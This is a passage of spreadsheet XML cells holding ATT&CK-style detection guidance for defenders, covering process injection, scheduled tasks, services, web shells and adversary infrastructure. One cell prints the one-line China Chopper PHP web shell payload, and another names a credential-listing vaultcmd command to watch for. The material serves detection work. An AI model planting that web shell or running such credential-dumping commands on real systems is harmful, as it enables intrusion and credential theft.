    <t>Monitor processes and arguments for malicious attempts to modify trust settings, such as the installation of root certificates or modifications to trust attributes/policies applied to files.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may perform sudo caching and/or use the suoders file to elevate privileges.</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may gather information in an attempt to calculate the geographical location of a victim host.</t>
  </si>
  <si>
    <t>Monitor for executed processes (such as ipconfig/ifconfig and arp) with arguments that may look for details about the network configuration and settings, such as IP and/or MAC addresses.</t>
  </si>
  <si>
    <t>Monitor for executed processes that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes with arguments that may try to get information about registered services. System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may abuse system services or daemons to execute commands or programs.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes of binaries involved in shutting down or rebooting systems.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may gather the system time and/or time zone from a local or remote system.</t>
  </si>
  <si>
    <t>Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.</t>
  </si>
  <si>
    <t>Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if an Office application is performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>Monitor processes with arguments that may potentially highlight adversary actions to modify Registry values (ex: &lt;code&gt;reg.exe&lt;/code&gt;) or modify/replace the legitimate &lt;code&gt;termsrv.dll&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Monitor newly executed processes, such as the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence by executing malicious content triggered by an interrupt signal.</t>
  </si>
  <si>
    <t>Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious. Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse Unix shell commands and scripts for execution.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence through executing malicious commands triggered by a user’s shell.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may search compromised systems to find and obtain insecurely stored credentials.</t>
  </si>
  <si>
    <t>User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). For example, on macOS systems the &lt;code&gt;screensharingd&lt;/code&gt; process may be related to VNC connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.</t>
  </si>
  <si>
    <t>Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.</t>
  </si>
  <si>
    <t>Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
&lt;code&gt;&lt;?php @eval($_POST['password']);&gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may abuse the Windows command shell for execution.</t>
  </si>
  <si>
    <t>Monitor newly executed processes for suspicious activity listing credentials from the Windows Credentials locker (e.g. &lt;code&gt;vaultcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines that can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders.</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes and/or command-lines of "wmic"</t>
  </si>
  <si>
    <t>Monitor newly executed processes that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM), as well as service processes such as &lt;code&gt;wmiprvse.exe&lt;/code&gt; on destination hosts.</t>
  </si>
  <si>
    <t>Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may modify XDG autostart entries to execute programs or commands during system boot.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded. The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.</t>
  </si>
  <si>
    <t>Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner that may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions.</t>
  </si>
  <si>
    <t>Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation) Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.</t>
  </si>
  <si>
    <t>Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner that may bypass UAC mechanisms to elevate process privileges on system.</t>
  </si>
  <si>
    <t>Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. For example, consider monitoring for Windows Event ID (EID) 400, which shows the version of PowerShell executing in the &lt;code&gt;EngineVersion&lt;/code&gt; field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the &lt;code&gt;HostName&lt;/code&gt; field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)</t>
  </si>
  <si>
    <t>Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow.</t>
  </si>
  <si>
    <t>Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal use of a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, monitoring for Windows event ID (EID) 400, specifically the &lt;code&gt;EngineVersion&lt;/code&gt; field which shows the version of PowerShell running, may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)</t>
  </si>
  <si>
    <t>Monitor for process memory inconsistencies compared to DLL files on disk by checking memory ranges against a known copy of the legitimate module.(Citation: Hiding Malicious Code with Module Stomping)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for file names that are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. </t>
  </si>
  <si>
    <t>Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)</t>
  </si>
  <si>
    <t>Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the &lt;code&gt;EngineVersion&lt;/code&gt; field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the &lt;code&gt;HostName&lt;/code&gt; field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)</t>
  </si>
  <si>
    <t>Monitor for process memory inconsistencies, such as checking memory ranges against a known copy of the legitimate module.(Citation: Hiding Malicious Code with Module Stomping)</t>
  </si>
  <si>
    <t>Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner that may perform sudo caching and/or use the suoders file to elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to processes that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Analyze process behavior to determine if a process is performing unusual actions, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>Monitor for changes made to processes that may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor processes for unexpected termination related to security tools/services. Specifically, before execution of ransomware, monitor for rootkit tools, such as GMER, PowerTool or TDSSKiller, that may detect and terminate hidden processes and the host antivirus software.
</t>
  </si>
  <si>
    <t>Monitor for unexpected deletions of a running process (ex: Sysmon EID 5 or Windows EID 4689) that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if critical processes are terminated or stop running.</t>
  </si>
  <si>
    <t>Once adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
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Once adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of capabilities, such as certificates, in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) , [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) , and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004) .</t>
  </si>
  <si>
    <t>Monitor for logged network traffic in response to a scan showing both protocol header and body values that may buy and/or steal SSL/TLS certificates that can be used during targeting. Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>If infrastructure or patterns in the malicious web content utilized to deliver a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).</t>
  </si>
  <si>
    <t>Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
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Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
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Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) or [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003) , [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) , or [Malicious Link](https://attack.mitre.org/techniques/T1204/001) .</t>
  </si>
  <si>
    <t>Monitor for logged network traffic in response to a scan showing both protocol header and body values that may buy and/or steal capabilities that can be used during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>If infrastructure or patterns in the malicious web content related to SEO poisoning or [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) have been previously identified, internet scanning may uncover when an adversary has staged web content supporting a strategic web compromise. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).</t>
  </si>
  <si>
    <t>Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)</t>
  </si>
  <si>
    <t>Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">Once adversaries leverage serverless functions as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle. </t>
  </si>
  <si>
    <t>Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.</t>
  </si>
  <si>
    <t>If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) .</t>
  </si>
  <si>
    <t>If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).</t>
  </si>
  <si>
    <t xml:space="preserve">Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
</t>
  </si>
  <si>
    <t>Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control [Web Service](https://attack.mitre.org/techniques/T1102) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567) .</t>
  </si>
  <si>
    <t>Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).</t>
  </si>
  <si>
    <t>Monitor for contextual data about an Internet-facing resource gathered from a scan, such as running services or ports that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Monitor for contextual data about an Internet-facing resource gathered from a scan, such as running services or ports that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Monitor for newly constructed scheduled jobs. If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. On Windows, enable the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service where several events will then be logged on scheduled task activity, including:(Citation: TechNet Forum Scheduled Task Operational Setting)
* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered
* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created
* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled
* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Monitor for the anomalous creation of scheduled jobs in container orchestration environments.</t>
  </si>
  <si>
    <t>Monitor for newly constructed scheduled jobs. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>Monitor for newly constructed scheduled jobs by enabling the "Microsoft-Windows-TaskScheduler/Operational" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered; Event ID 4698 on Windows 10, Server 2016 - Scheduled task created;_x000D_
Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled;_x000D_
Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled</t>
  </si>
  <si>
    <t>Monitor newly constructed scheduled jobs that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.</t>
  </si>
  <si>
    <t>Monitor for contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.</t>
  </si>
  <si>
    <t>Monitor for changes made to scheduled jobs that may attempt to remove artifacts on a host system.</t>
  </si>
  <si>
    <t>Monitor for changes made to scheduled jobs for unexpected modifications to execution launch</t>
  </si>
  <si>
    <t>Monitor for changes made to scheduled jobs that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. </t>
  </si>
  <si>
    <t>Monitor for any attempts to enable scripts running on a system would be considered suspicious. Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)</t>
  </si>
  <si>
    <t>Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.  Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Monitor for any attempts to enable scripts running on a system would be considered suspicious. OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/</t>
  </si>
  <si>
    <t>Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.(Citation: MDSec Detecting DOTNET)(Citation: Introducing Donut)</t>
  </si>
  <si>
    <t>Consider monitoring and/or blocking suspicious execution of Active Directory PowerShell modules, such as &lt;code&gt;Set-ADUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountControl&lt;/code&gt;, that change account configurations.</t>
  </si>
  <si>
    <t>Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons through Windows event logs for event IDs 4697 and 7045. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as remote logins or process creation events.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed services/daemons that may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. </t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons through Windows event logs for event IDs 4697 and 7045. (Citation: Secure Ideas SMB Relay) Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s KnockKnock application. </t>
  </si>
  <si>
    <t>Monitor for newly constructed services may create or modify Launch Daemons to execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons to execute commands or programs.</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.</t>
  </si>
  <si>
    <t>Monitor for newly constructed services/daemons that may carry out malicious operations using a virtual instance to avoid detection. Consider monitoring for new [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software.</t>
  </si>
  <si>
    <t>Monitor newly constructed services that abuse control manager to execute malicious commands or payloads.</t>
  </si>
  <si>
    <t>Monitor for new constructed systemd services to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)), especially those associated with unknown/abnormal drivers. New, benign services may be created during installation of new software.</t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;).(Citation: Microsoft Issues with BITS July 2011)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for telemetry that provides context of security software services being disabled or modified. In cloud environments, monitor virtual machine logs for the status of cloud security agents. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. </t>
  </si>
  <si>
    <t>Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.</t>
  </si>
  <si>
